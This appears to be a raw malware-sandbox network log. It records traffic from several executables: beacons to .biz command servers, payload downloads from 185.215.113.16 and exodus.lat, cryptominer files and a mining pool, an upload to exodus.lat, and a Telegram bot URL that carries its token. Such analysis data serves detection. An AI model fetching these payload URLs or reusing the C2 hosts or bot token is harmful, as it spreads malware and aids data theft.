999 B
4.8kB
9
9

HTTP Request

POST https://dare-curbys.biz/api

HTTP Response

200
172.67.153.96:443

https://dwell-exclaim.biz/api

tls, http

BhD8htX.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://dwell-exclaim.biz/api

HTTP Response

200
104.21.35.246:443

https://print-vexer.biz/api

tls, http

2M4078.exe

999 B
4.8kB
9
9

HTTP Request

POST https://print-vexer.biz/api

HTTP Response

200
172.67.173.74:443

https://formy-spill.biz/api

tls, http

BhD8htX.exe

999 B
4.8kB
9
9

HTTP Request

POST https://formy-spill.biz/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

2M4078.exe

1.5kB
43.2kB
21
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

BhD8htX.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
172.67.160.80:443

https://marshal-zhukov.com/api

tls, http

2M4078.exe

1.7kB
10.3kB
14
16

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

403

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
104.21.43.156:443

https://dare-curbys.biz/api

tls, http

BhD8htX.exe

999 B
4.8kB
9
9

HTTP Request

POST https://dare-curbys.biz/api

HTTP Response

200
104.21.35.246:443

https://print-vexer.biz/api

tls, http

BhD8htX.exe

999 B
4.8kB
9
9

HTTP Request

POST https://print-vexer.biz/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

BhD8htX.exe

1.5kB
43.2kB
21
36

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
172.67.160.80:443

https://marshal-zhukov.com/api

tls, http

BhD8htX.exe

1.7kB
10.3kB
14
16

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

403

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

3Z39A.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/off/random.exe

http

skotes.exe

380.6kB
11.1MB
7761
7977

HTTP Request

GET http://185.215.113.16/luma/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/steam/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/well/random.exe

HTTP Response

200

HTTP Request

GET http://185.215.113.16/off/random.exe

HTTP Response

200
172.67.165.166:443

https://atten-supporse.biz/api

tls, http

f56e441c8f.exe

1.0kB
4.8kB
9
9

HTTP Request

POST https://atten-supporse.biz/api

HTTP Response

200
104.21.81.153:443

https://se-blurry.biz/api

tls, http

f56e441c8f.exe

995 B
4.8kB
9
9

HTTP Request

POST https://se-blurry.biz/api

HTTP Response

200
172.67.136.167:443

https://zinc-sneark.biz/api

tls, http

f56e441c8f.exe

1.4kB
5.1kB
11
10

HTTP Request

POST https://zinc-sneark.biz/api

HTTP Response

200
172.67.153.96:443

https://dwell-exclaim.biz/api

tls, http

f56e441c8f.exe

1.5kB
5.0kB
12
9

HTTP Request

POST https://dwell-exclaim.biz/api

HTTP Response

200
172.67.173.74:443

https://formy-spill.biz/api

tls, http

f56e441c8f.exe

1.5kB
4.8kB
12
9

HTTP Request

POST https://formy-spill.biz/api

HTTP Response

200
172.67.206.64:443

https://covery-mover.biz/api

tls, http

f56e441c8f.exe

1.1kB
4.8kB
10
10

HTTP Request

POST https://covery-mover.biz/api

HTTP Response

200
104.21.43.156:443

https://dare-curbys.biz/api

tls, http

f56e441c8f.exe

1.1kB
4.8kB
11
9

HTTP Request

POST https://dare-curbys.biz/api

HTTP Response

200
104.21.35.246:443

https://print-vexer.biz/api

tls, http

f56e441c8f.exe

1.1kB
4.8kB
10
9

HTTP Request

POST https://print-vexer.biz/api

HTTP Response

200
23.214.143.155:443

https://steamcommunity.com/profiles/76561199724331900

tls, http

f56e441c8f.exe

1.7kB
43.2kB
24
37

HTTP Request

GET https://steamcommunity.com/profiles/76561199724331900

HTTP Response

200
172.67.160.80:443

https://marshal-zhukov.com/api

tls, http

f56e441c8f.exe

1.7kB
10.4kB
15
17

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

403

HTTP Request

POST https://marshal-zhukov.com/api

HTTP Response

200
185.215.113.206:80

http://185.215.113.206/c4becf79229cb002.php

http

1dd8bdd825.exe

819 B
625 B
7
5

HTTP Request

GET http://185.215.113.206/

HTTP Response

200

HTTP Request

POST http://185.215.113.206/c4becf79229cb002.php

HTTP Response

200
127.0.0.1:58570

firefox.exe
216.58.213.14:443

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

tls, http2

firefox.exe

2.0kB
8.9kB
15
16

HTTP Request

GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
216.58.213.14:443

youtube.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
34.149.97.1:443

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

tls, http2

firefox.exe

2.1kB
13.7kB
17
22

HTTP Request

GET https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30
142.250.187.206:443

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

tls, http2

firefox.exe

2.9kB
66.0kB
26
62

HTTP Request

GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

HTTP Request

GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
142.250.200.14:443

consent.youtube.com

tls, http2

firefox.exe

1.4kB
7.6kB
10
10
34.117.121.53:443

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

tls, http2

firefox.exe

1.6kB
21.2kB
16
26

HTTP Request

GET https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
142.250.187.196:443

https://www.google.com/favicon.ico

tls, http2

firefox.exe

2.0kB
7.4kB
15
16

HTTP Request

GET https://www.google.com/favicon.ico
45.74.38.211:4782

YLFOGIOE

tls

RegAsm.exe

42.2kB
178.6kB
92
172
92.63.197.221:80

http://92.63.197.221/add?substr=mixtwo&s=three&sub=

http

4fe69191d8.exe

549 B
92 B
3
2

HTTP Request

GET http://92.63.197.221/add?substr=mixtwo&s=three&sub=
127.0.0.1:58578

firefox.exe
203.161.45.11:443

https://exodus.lat/ss.bat

tls, http

powershell.exe

811 B
10.3kB
8
11

HTTP Request

GET https://exodus.lat/ss.bat

HTTP Response

200
203.161.45.11:443

https://exodus.lat/COMSurrogate.exe

tls, http

powershell.exe

1.5kB
176.8kB
24
130

HTTP Request

GET https://exodus.lat/COMSurrogate.exe

HTTP Response

200
203.161.45.11:443

https://exodus.lat/COMSurrogate.exe

tls, http

powershell.exe

1.8kB
176.8kB
32
130

HTTP Request

GET https://exodus.lat/COMSurrogate.exe

HTTP Response

200
172.67.74.152:443

https://api.ipify.org/

tls, http

curl.exe

810 B
4.2kB
9
10

HTTP Request

GET https://api.ipify.org/

HTTP Response

200
142.250.200.35:80

http://c.pki.goog/r/r4.crl

http

602 B
3.9kB
8
6

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
203.161.45.11:443

https://cdn-downloads.com/files/nvrtc-builtins64_102.dll

tls, http

COMSurrogate.exe

534.9kB
61.5MB
11391
44018

HTTP Request

GET https://cdn-downloads.com/files/mi.exe

HTTP Response

200

HTTP Request

GET https://cdn-downloads.com/files/config.json

HTTP Response

200

HTTP Request

GET https://cdn-downloads.com/files/WinRing0x64.sys

HTTP Response

200

HTTP Request

GET https://cdn-downloads.com/files/SHA256SUMS

HTTP Response

200

HTTP Request

GET https://cdn-downloads.com/files/xmrig-cuda.dll

HTTP Response

200

HTTP Request

GET https://cdn-downloads.com/files/nvrtc64_102_0.dll

HTTP Request

GET https://cdn-downloads.com/files/nvrtc-builtins64_102.dll
203.161.45.11:443

https://exodus.lat/files/upload.php

tls, http

curl.exe

3.0kB
3.9kB
14
10

HTTP Request

POST https://exodus.lat/files/upload.php

HTTP Response

200
88.221.135.106:80

http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D

http

568 B
1.1kB
7
5

HTTP Request

GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D

HTTP Response

200
35.190.72.216:443

https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb

tls, http2

firefox.exe

1.9kB
4.8kB
15
18

HTTP Request

GET https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
142.250.187.206:443

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

tls, http2

firefox.exe

1.5kB
8.9kB
16
21

HTTP Request

GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
88.221.134.209:80

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

http

firefox.exe

6.3kB
506.3kB
131
366

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

HTTP Response

200
74.125.175.169:443

https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

tls, http

firefox.exe

393.7kB
11.3MB
6348
8097

HTTP Request

GET https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

HTTP Response

200
142.250.179.238:443

play.google.com

tls

firefox.exe

1.3kB
7.6kB
9
10
149.154.167.220:443

https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage

tls, http

COMSurrogate.exe

1.1kB
7.1kB
11
13

HTTP Request

POST https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage

HTTP Response

200
95.179.241.203:80

pool.hashvault.pro

http

mi.exe

836 B
1.9kB
6
5
142.250.200.14:443

consent.youtube.com

tls, http2

firefox.exe

1.3kB
7.6kB
9
10
188.119.66.185:443

https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359

tls, http

rafencoder.exe

1.4kB
8.2kB
11
13

HTTP Request

GET https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788

HTTP Response

200

HTTP Request

GET https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359

HTTP Response

200
31.214.157.206:2024

rafencoder.exe

605 B
174 B
5
4

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

74.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

74.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

atten-supporse.biz

dns

f56e441c8f.exe

64 B
96 B
1
1

DNS Request

atten-supporse.biz

DNS Response

172.67.165.166

104.21.16.9
8.8.8.8:53

166.165.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

166.165.67.172.in-addr.arpa
8.8.8.8:53

se-blurry.biz

dns

f56e441c8f.exe

59 B
91 B
1
1

DNS Request

se-blurry.biz

DNS Response

104.21.81.153

172.67.162.65
8.8.8.8:53

zinc-sneark.biz

dns

f56e441c8f.exe

61 B
93 B
1
1

DNS Request

zinc-sneark.biz

DNS Response

172.67.136.167

104.21.62.142
8.8.8.8:53

153.81.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

153.81.21.104.in-addr.arpa
8.8.8.8:53

104.219.191.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

104.219.191.52.in-addr.arpa
8.8.8.8:53

43.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

43.113.215.185.in-addr.arpa
8.8.8.8:53

dwell-exclaim.biz

dns

f56e441c8f.exe

63 B
95 B
1
1

DNS Request

dwell-exclaim.biz

DNS Response

172.67.153.96

104.21.88.210
8.8.8.8:53

167.136.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

167.136.67.172.in-addr.arpa
8.8.8.8:53

96.153.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

96.153.67.172.in-addr.arpa
8.8.8.8:53

11.244.41.31.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.244.41.31.in-addr.arpa
8.8.8.8:53

formy-spill.biz

dns

f56e441c8f.exe

61 B
93 B
1
1

DNS Request

formy-spill.biz

DNS Response

172.67.173.74

104.21.96.55
8.8.8.8:53

74.173.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

74.173.67.172.in-addr.arpa
8.8.8.8:53

ratiomun.cyou

dns

BhD8htX.exe

59 B
124 B
1
1

DNS Request

ratiomun.cyou
8.8.8.8:53

covery-mover.biz

dns

f56e441c8f.exe

62 B
94 B
1
1

DNS Request

covery-mover.biz

DNS Response

172.67.206.64

104.21.58.186
8.8.8.8:53

dare-curbys.biz

dns

f56e441c8f.exe

61 B
93 B
1
1

DNS Request

dare-curbys.biz

DNS Response

104.21.43.156

172.67.181.44
8.8.8.8:53

64.206.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

64.206.67.172.in-addr.arpa
8.8.8.8:53

156.43.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

156.43.21.104.in-addr.arpa
8.8.8.8:53

print-vexer.biz

dns

f56e441c8f.exe

61 B
93 B
1
1

DNS Request

print-vexer.biz

DNS Response

104.21.35.246

172.67.181.192
8.8.8.8:53

246.35.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

246.35.21.104.in-addr.arpa
8.8.8.8:53

impend-differ.biz

dns

f56e441c8f.exe

63 B
125 B
1
1

DNS Request

impend-differ.biz
8.8.8.8:53

steamcommunity.com

dns

f56e441c8f.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

marshal-zhukov.com

dns

f56e441c8f.exe

64 B
96 B
1
1

DNS Request

marshal-zhukov.com

DNS Response

172.67.160.80

104.21.82.174
8.8.8.8:53

155.143.214.23.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

155.143.214.23.in-addr.arpa
8.8.8.8:53

80.160.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

80.160.67.172.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

206.113.215.185.in-addr.arpa

dns

74 B
134 B
1
1

DNS Request

206.113.215.185.in-addr.arpa
8.8.8.8:53

16.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

16.113.215.185.in-addr.arpa
8.8.8.8:53

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

dns

Dr.com

273 B
166 B
3
1

DNS Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

DNS Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

DNS Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
8.8.8.8:53

197.87.175.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

197.87.175.4.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

92.12.20.2.in-addr.arpa

dns

69 B
131 B
1
1

DNS Request

92.12.20.2.in-addr.arpa
8.8.8.8:53

impend-differ.biz

dns

f56e441c8f.exe

63 B
125 B
1
1

DNS Request

impend-differ.biz
8.8.8.8:53

steamcommunity.com

dns

f56e441c8f.exe

64 B
80 B
1
1

DNS Request

steamcommunity.com

DNS Response

23.214.143.155
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

spocs.getpocket.com

dns

firefox.exe

130 B
262 B
2
2

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166

DNS Request

spocs.getpocket.com

DNS Response

34.117.188.166
8.8.8.8:53

firefox-api-proxy.cdn.mozilla.net

dns

firefox.exe

79 B
160 B
1
1

DNS Request

firefox-api-proxy.cdn.mozilla.net

DNS Response

34.149.97.1
8.8.8.8:53

youtube.com

dns

firefox.exe

57 B
73 B
1
1

DNS Request

youtube.com

DNS Response

216.58.213.14
8.8.8.8:53

youtube.com

dns

firefox.exe

114 B
170 B
2
2

DNS Request

youtube.com

DNS Response

2a00:1450:4009:816::200e

DNS Request

youtube.com

DNS Response

2a00:1450:4009:816::200e
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

200 B
232 B
2
2

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

34.149.97.1
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166

DNS Request

prod.ads.prod.webservices.mozgcp.net

DNS Response

34.117.188.166
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

148 B
256 B
2
2

DNS Request

172.210.232.199.in-addr.arpa

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

206 B
238 B
2
2

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

dns

firefox.exe

100 B
128 B
1
1

DNS Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

DNS Response

2600:1901:0:74e4::
8.8.8.8:53

prod.ads.prod.webservices.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.ads.prod.webservices.mozgcp.net
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

52.32.237.164

44.226.106.83

52.33.23.190
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

206 B
262 B
2
2

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
216.58.213.14:443

youtube.com

https

firefox.exe

1.8kB
9.3kB
6
10
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

https

firefox.exe

1.8kB
4.4kB
6
6
8.8.8.8:53

www.youtube.com

dns

firefox.exe

122 B
574 B
2
2

DNS Request

www.youtube.com

DNS Response

142.250.187.206

142.250.200.46

142.250.179.238

142.250.180.14

172.217.169.46

172.217.169.78

172.217.16.238

216.58.201.110

142.250.187.238

142.250.200.14

216.58.204.78

142.250.178.14

DNS Request

www.youtube.com

DNS Response

172.217.16.238

142.250.180.14

172.217.169.78

142.250.178.14

142.250.200.46

172.217.169.46

142.250.187.206

142.250.179.238

142.250.187.238

142.250.200.14

216.58.204.78

216.58.201.110
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
220 B
2
2

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

138 B
522 B
2
2

DNS Request

youtube-ui.l.google.com

DNS Response

172.217.16.238

142.250.178.14

172.217.169.46

142.250.200.46

142.250.187.238

142.250.200.14

142.250.187.206

142.250.179.238

142.250.180.14

172.217.169.78

216.58.204.78

216.58.201.110

DNS Request

youtube-ui.l.google.com

DNS Response

142.250.180.14

216.58.201.110

142.250.178.14

142.250.187.238

216.58.204.78

142.250.200.46

172.217.16.238

142.250.200.14

142.250.187.206

142.250.179.238

172.217.169.78

172.217.169.46
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

138 B
362 B
2
2

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:815::200e

2a00:1450:4009:823::200e

2a00:1450:4009:821::200e

2a00:1450:4009:822::200e

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:821::200e

2a00:1450:4009:823::200e

2a00:1450:4009:822::200e

2a00:1450:4009:815::200e
142.250.187.206:443

youtube-ui.l.google.com

https

firefox.exe

2.8kB
10.5kB
11
14
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

130 B
162 B
2
2

DNS Request

consent.youtube.com

DNS Response

142.250.200.14

DNS Request

consent.youtube.com

DNS Response

142.250.200.14
8.8.8.8:53

14.213.58.216.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

14.213.58.216.in-addr.arpa
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

firefox.exe

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

164.237.32.52.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

164.237.32.52.in-addr.arpa
8.8.8.8:53

206.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.187.250.142.in-addr.arpa
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.200.14
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

consent.youtube.com

DNS Response

2a00:1450:4009:822::200e
142.250.200.14:443

consent.youtube.com

https

firefox.exe

2.2kB
9.4kB
10
11
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

212 B
244 B
2
2

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

212 B
398 B
2
2

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

14.200.250.142.in-addr.arpa

dns

146 B
224 B
2
2

DNS Request

14.200.250.142.in-addr.arpa

DNS Request

14.200.250.142.in-addr.arpa
8.8.8.8:53

227.187.250.142.in-addr.arpa

dns

148 B
224 B
2
2

DNS Request

227.187.250.142.in-addr.arpa

DNS Request

227.187.250.142.in-addr.arpa
8.8.8.8:53

74.204.58.216.in-addr.arpa

dns

144 B
342 B
2
2

DNS Request

74.204.58.216.in-addr.arpa

DNS Request

74.204.58.216.in-addr.arpa
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

120 B
152 B
2
2

DNS Request

www.google.com

DNS Response

142.250.187.196

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004
142.250.187.196:443

www.google.com

https

firefox.exe

2.0kB
9.3kB
8
10
8.8.8.8:53

195.187.250.142.in-addr.arpa

dns

148 B
224 B
2
2

DNS Request

195.187.250.142.in-addr.arpa

DNS Request

195.187.250.142.in-addr.arpa
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

148 B
224 B
2
2

DNS Request

196.187.250.142.in-addr.arpa

DNS Request

196.187.250.142.in-addr.arpa
8.8.8.8:53

211.38.74.45.in-addr.arpa

dns

71 B
136 B
1
1

DNS Request

211.38.74.45.in-addr.arpa
8.8.8.8:53

221.197.63.92.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

221.197.63.92.in-addr.arpa
8.8.8.8:53

exodus.lat

dns

curl.exe

112 B
144 B
2
2

DNS Request

exodus.lat

DNS Request

exodus.lat

DNS Response

203.161.45.11

DNS Response

203.161.45.11
8.8.8.8:53

11.45.161.203.in-addr.arpa

dns

144 B
238 B
2
2

DNS Request

11.45.161.203.in-addr.arpa

DNS Request

11.45.161.203.in-addr.arpa
8.8.8.8:53

api.ipify.org

dns

curl.exe

59 B
107 B
1
1

DNS Request

api.ipify.org

DNS Response

172.67.74.152

104.26.13.205

104.26.12.205
8.8.8.8:53

c.pki.goog

dns

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.200.35
8.8.8.8:53

152.74.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

152.74.67.172.in-addr.arpa
8.8.8.8:53

cdn-downloads.com

dns

COMSurrogate.exe

63 B
79 B
1
1

DNS Request

cdn-downloads.com

DNS Response

203.161.45.11
8.8.8.8:53

r11.o.lencr.org

dns

61 B
160 B
1
1

DNS Request

r11.o.lencr.org

DNS Response

88.221.135.106

88.221.135.113
8.8.8.8:53

168.245.100.95.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

168.245.100.95.in-addr.arpa
8.8.8.8:53

106.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

106.135.221.88.in-addr.arpa
8.8.8.8:53

location.services.mozilla.com

dns

firefox.exe

75 B
153 B
1
1

DNS Request

location.services.mozilla.com

DNS Response

35.190.72.216
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

164 B
196 B
2
2

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201

DNS Response

35.244.181.201
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.classify-client.prod.webservices.mozgcp.net

DNS Response

35.190.72.216
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

201.181.244.35.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

201.181.244.35.in-addr.arpa
8.8.8.8:53

prod.classify-client.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.classify-client.prod.webservices.mozgcp.net
35.190.72.216:443

prod.classify-client.prod.webservices.mozgcp.net

https

firefox.exe

1.8kB
4.3kB
6
6
8.8.8.8:53

